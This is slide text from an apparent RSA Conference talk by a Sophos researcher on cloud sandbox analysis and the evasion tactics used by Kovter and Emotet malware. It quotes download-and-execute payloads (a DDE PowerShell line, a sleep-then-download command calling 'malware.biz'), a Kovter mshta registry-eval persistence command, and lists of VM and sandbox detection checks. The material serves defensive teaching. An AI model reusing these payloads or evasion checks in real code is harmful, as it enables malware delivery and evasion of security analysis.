SESSION ID: #RSAC Michael Wood PLAYING GAMES IN THE SANDBOX— DYNAMIC ANALYSIS AND MODERN EVASION TACTICS AIR-F03 Senior Manager, Dynamic Protection, SophosLabs Sophos
SESSION ID:
#RSAC
Michael Wood
PLAYING GAMES IN THE SANDBOXDYNAMIC ANALYSIS AND MODERN EVASION TACTICS
AIR-F03
Senior Manager, Dynamic Protection, SophosLabsSophos
# R S A C
Cloud Sandbox
2
Internet
Known Good Execute Known Bad?
Sandbox
# R S A C
Malware comes in all shapes and sizes o Windows executableso Office & PDF documentso Scripts, Java, Windows Shortcutso Zip, Tar, Rar, & archives
Detect 0-day threats based on behavior
What is a Cloud Sandbox useful for?
3
# R S A C
Example: 0-day DDE exploit
4
Intended use spreadsheet data link{ DDEAUTO excel "C:\\My Documents\\Profits.xls "Sheet1!R1C1:R4C4" \p }
Exploited use malware download{ DDEAUTO cmd.exe /k powershell -NonI -NoP -sta $a1=(new-object IO.StreamReader((([Net.WebRequest]::Create([System.Uri]'http://redacted[.]com/kdjsw23FGS')).GetResponse()).GetResponseStream())).ReadToEnd();powershell -e $a1 }
# R S A C
Malware comes in all shapes and sizes o Windows executableso Office & PDF documentso Scripts, Java, Windows Shortcutso Zip, Tar, Rar, & archives
Detect 0-day threats based on behavior
But what if the threat behaves differently in the Sandbox?
What is a Cloud Sandbox useful for?
5
# R S A C
Evasive threats
6
IF is_sandbox() THENsomething_good()
ELSEsomething_bad()
# R S A C
is_sandbox()
Artifacts: Files, Registry Keys, Drivers, Disk/CPU names Behavior: CPU behavior
Anti-VM
Artifacts: tools or scripts, realistic hardware Behavior: human-like activity
Anti-sandbox
Explicit delay: Sleep() Implicit delay: user interaction required
Timing
# R S A C
something_good()
ExitProcess() Loop forever Self delete
#RSAC
IN THE WILD
# R S A C
Kovter Malware
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
mshta.exe javascript: W9N=new ActiveXObject("WScript.Shell"); ztJ4n7=W9N.RegRead("HKCU\\software\\4a9e7b11c0\\6bee3829"); eval(ztJ4n7);
# R S A C
Kovter VM Evasion Tests
11
Running processesVBoxService.exeVMwareUser.exe
Registry keysHARDWARE\\ACPI\\DSDT\\VBOX__
HKLM\\SOFTWARE\\VMWare, Inc.
Other artifacts\\.\vmmemctl PIPEVMwareCopyPasteSetClipboard event
# R S A C
CPUID - Artifacts
CPUID Vendor -> GenuineIntelCPUID Hypervisor -> 0x0
CPUID Vendor -> KVMKVMKVMCPUID Hypervisor -> 0x80000000
# R S A C
CPUID - Timing
CPUID
CPUID
GenuineIntel
t1
t2
t1t2
CPUID cost
# R S A C
Evasive Activity
Legitimacy
#RSAC
ACTIVE EVASIONS
# R S A C
Document Malware
# R S A C
Macro Evasion: Realistic Filename
Is my file name
only hexadecimal characters?
# R S A C
Macro Evasion: Realistic History
Is there fewer than 3 recently used
files?
# R S A C
Macro Evasion: Blacklist Processes
Are there any VM or analysis tools
running?
# R S A C
Macro Evasion: GEO IP
Does the GEO IP match my target?
# R S A C
Leverage #1 - Protection
is_sandbox() something_bad()
# R S A C
Leverage #2 Bypass
Does C:\B78AE926 exist?
No: Run evasions
Yes: Run malware
# R S A C
Leverage #3 - Vaccination
is_sandbox() == TRUE
#RSAC
PASSIVE EVASIONS
# R S A C
Documents: Some Clicks Required
# R S A C
Time: 0 min Time: 2 min
Time: 5 min
Explicit Delay
powershell sleep 300;new-object system.net.webclient.downloadfile). Invoke('https://malware.biz/foo',%TEMP%\Local.exe')& start-process %TEMP%\Local.exe'"
Sandbox Analysis
# R S A C
Implicit Delay: Busy work
FOR i=0; i < 500,000; i++ DOIsDebuggerPresent()
END FOR
Bare Metal Virtual Machine Sandbox
# R S A C
Typical Human Input
GetLastInputInfo() GetCursorPos()
# R S A C
File Structure
> unzip -l IMAGES.ZIP
Length Date Time Name--------- ---------- ----- ----
518144 2018-01-17 02:17 IMG_1715.jpg
#RSAC
EVASIVE TIMELINE: EMOTET
# R S A C
Emotet Delivery: Some Clicks Required
# R S A C
Emotet: Custom Loader
Jul 2017 Decrypts in-place Aug 2017 Loader added
Packed EXE decrypt Emotet EXE Packed EXE decrypt
EmotetEXE
Loader EXE
# R S A C
Emotet EXE
Emotet Oct 2017, is_sandbox() v1
Loader EXEevasions
is_sandboxsample.exe artifact.exe
John Doe
TEQUILABOOMBOOM Wilbert / SC
admin / SystemIT
C:\123\email.doc C:\email.htm C:\email.doc
# R S A C
Emotet: Loader In-Memory Obfuscation
Emotet EXE
Loader EXEbusy work
Stolen Code
1. New memory region for stolen instructions
2. Steal instructions from EXE, patch in detour to busy work routine
evasions
# R S A C
Emotet: Dec 2017, is_sandbox() v2
Loader Evasions V1
String comparisons tested via lstrcmpA API
File existence tested via CreateFileA API
Sandbox detected => ExitProcess()
Loader Evasions V2
String comparisons inline strcmpfunction, no API
File existence full file system enumeration via FindFirstFile API
Sandbox detected => repeat evasion tests, infinitely
# R S A C
Emotet: Dec 2017, is_sandbox() v2
Loader Evasions V1
String comparisons tested via lstrcmpA API
File existence tested via CreateFileA API
Sandbox detected => ExitProcess()
Loader Evasions V2
String comparisons inline strcmpfunction, no API
File existence full file system enumeration via FindFirstFile API
Sandbox detected => repeat evasion tests, infinitely
Hide sensitive strings, like TEQUILABOOMBOOM
Queries for sensitive data remain
# R S A C
Emotet: Dec 2017, is_sandbox() v2
Loader Evasions V1
String comparisons tested via lstrcmpA API
File existence tested via CreateFileA API
Sandbox detected => ExitProcess()
Loader Evasions V2
String comparisons inline strcmpfunction, no API
File existence full file system enumeration via FindFirstFile API
Sandbox detected => repeat evasion tests, infinitely
Hide sensitive strings, like sample.exe
Huge increase in file system inspection activity
# R S A C
Emotet: Dec 2017, is_sandbox() v2
Loader Evasions V1
String comparisons tested via lstrcmpA API
File existence tested via CreateFileA API
Sandbox detected => ExitProcess()
Loader Evasions V2
String comparisons inline strcmpfunction, no API
File existence full file system enumeration via FindFirstFile API
Sandbox detected => repeat evasion tests, infinitely
Avoid bailout tell
Repeated increase in file system inspection activity
# R S A C
Emotet: Jan 2018, Evasion Fragments
39
is_sandbox() disabled, but
Dec 2017
TEQUILABOOMBOOM
SystemIT
John Doe
Jan 2018
"T E Q U I L A B O O M B O O M
S y s t e m I T
Aller Doe
# R S A C
Emotet: Feb 2018, Evasion Retraction
Emotet EXE
Loader EXE
Stolen Code
busy work
evasions
# R S A C
Emotet Evasive Tactic Timeline
Jul 2017Busy work
Aug 2017Loader module
Oct 2017is_sandbox v1
Dec 2017is_sandbox v2something_good
v2
Jan 2018is_sandbox offFragments
remain
Feb 2018is_sandbox
removed
#RSAC
TAKEAWAYS
# R S A C
Summary
Leverage is_sandbox() == something_bad()
Battle ground Infinitely many tactics, equally many defenses
Raise the bar Attacks require greater depth & complexity
# R S A C
Predictions
Virtual machine tactics - expect declineExisting mitigations, assets in the cloud
Human-like behavior expect growthReal user activity, victim profiling
Avoid detonation expect growthDodge execution in the Sandbox altogether
# R S A C
Actions: Engage, Familiarize, Experiment
Security partners approach to evasive threatsEngage Open-source tools to test anti-sandbox tacticsFamiliarize Deploy your own open-source sandboxExperiment
PAFish Tool https://github.com/a0rtega/pafishAl-Khaser Tool https://github.com/LordNoteworthy/al-khaserCuckoo Sandbox https://cuckoosandbox.org/
https://github.com/a0rtega/pafishhttps://github.com/LordNoteworthy/al-khaserhttps://cuckoosandbox.org/
#RSAC
THANK YOU
Playing Games in the SandboxDynamic Analysis and Modern Evasion TacticsCloud SandboxWhat is a Cloud Sandbox useful for?Example: 0-day DDE exploitWhat is a Cloud Sandbox useful for?Evasive threatsis_sandbox()something_good()In the wildKovter MalwareKovter VM Evasion TestsCPUID - ArtifactsCPUID - TimingSlide Number 14Active evasionsDocument MalwareMacro Evasion: Realistic Filename Macro Evasion: Realistic HistoryMacro Evasion: Blacklist Processes Macro Evasion: GEO IPLeverage #1 - ProtectionLeverage #2 BypassLeverage #3 - VaccinationPassive EvasionsDocuments: Some Clicks RequiredExplicit DelayImplicit Delay: Busy workTypical Human InputFile StructureEvasive timeline: EmotetEmotet Delivery: Some Clicks RequiredEmotet: Custom LoaderEmotet Oct 2017, is_sandbox() v1Emotet: Loader In-Memory ObfuscationEmotet: Dec 2017, is_sandbox() v2Emotet: Dec 2017, is_sandbox() v2Emotet: Dec 2017, is_sandbox() v2Emotet: Dec 2017, is_sandbox() v2Emotet: Jan 2018, Evasion FragmentsEmotet: Feb 2018, Evasion RetractionEmotet Evasive Tactic TimelineTakeawaysSummaryPredictionsActions: Engage, Familiarize, ExperimentThank you